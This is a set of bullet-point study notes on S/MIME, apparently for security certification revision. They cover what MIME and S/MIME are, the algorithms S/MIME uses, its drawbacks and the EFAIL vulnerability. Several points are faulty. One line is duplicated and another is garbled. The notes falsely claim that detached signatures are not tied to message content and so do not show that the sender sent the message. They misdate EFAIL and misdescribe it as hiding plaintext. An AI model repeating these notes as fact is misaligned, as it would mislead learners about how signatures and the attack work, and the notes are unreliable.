Secure Multipurpose Internet Mail Extensions (S/MIME)
Multipurpose Internet Mail Extensions (MIME) is an Internet standard that extends the format of an email message to support non-ASCII character sets and multimedia attachments.
Secure Multipurpose Internet Mail Extensions (S/MIME) is an Internet standard for signing and encrypting MIME data.
- provides presentation-layer authentication, message integrity, nonrepudiation, confidentiality, and data security benefits to users
- is a protocol for securing email communications
- encrypts emails and enables sender authentication to ensure confidentiality and integrity
- uses public key encryption to secure email content
- incorporates digital signatures to support sender verification and ensure messages are unmodified
- implementation is often complicated
- prone to misconfiguration
- complex certificate management and validation
- requires an X.509 certificate for each email client
- can use RSA, DSA, and ECDSA for digital signatures
- can use AES and 3DES for message encryption
- is an end-to-end security solution
- defeats/complicates attempts to have enterprise-wide or server-hosted antimalware scanning
- S/MIME has encrypted such malware or banned content by encrypting the message content and its attachments
- defeats/complicates attempts to have enterprise-wide or server-hosted antimalware scanning
- signatures are detached
- not tied to the content of the message itself
- so only authenticates sender’s identity, not that the sender sent the message
- in 2019 EFF announced the critical vulnerability EFAIL
- can allow attackers to hide unknown plaintext within the original message (using various HTML tags)
- affects many email systems